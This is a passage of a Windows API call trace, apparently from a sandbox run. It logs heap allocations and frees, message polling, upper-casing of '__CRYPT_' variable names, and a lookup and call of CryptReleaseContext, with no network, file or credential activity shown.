dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0247.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0247.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0247.659] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0247.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0247.660] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0247.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0247.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.660] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0247.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0247.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0247.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0247.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0247.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0247.661] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.661] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0247.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0247.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0247.661] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0247.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.661] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0247.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0247.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0247.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0247.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0247.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0247.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0247.662] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0247.662] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0247.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.662] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0247.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0247.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0247.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0247.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0247.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0247.663] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0247.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0247.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.663] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0247.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0247.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0247.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0247.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0247.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0247.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0247.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0247.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0247.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0247.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0247.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0247.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0247.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0247.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0247.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0247.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0247.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0247.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0247.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0247.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0247.665] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0247.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0247.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0247.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.673] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0247.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0247.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0247.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0247.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0247.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0247.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0247.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0247.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0247.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0247.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0247.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0247.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0247.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0247.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0247.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0247.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0247.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0247.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0247.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0247.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0247.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0247.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0247.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0247.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0247.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0247.712] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0247.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0247.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0247.712] RtlAllocateHeap (HeapHandle=0x970000, 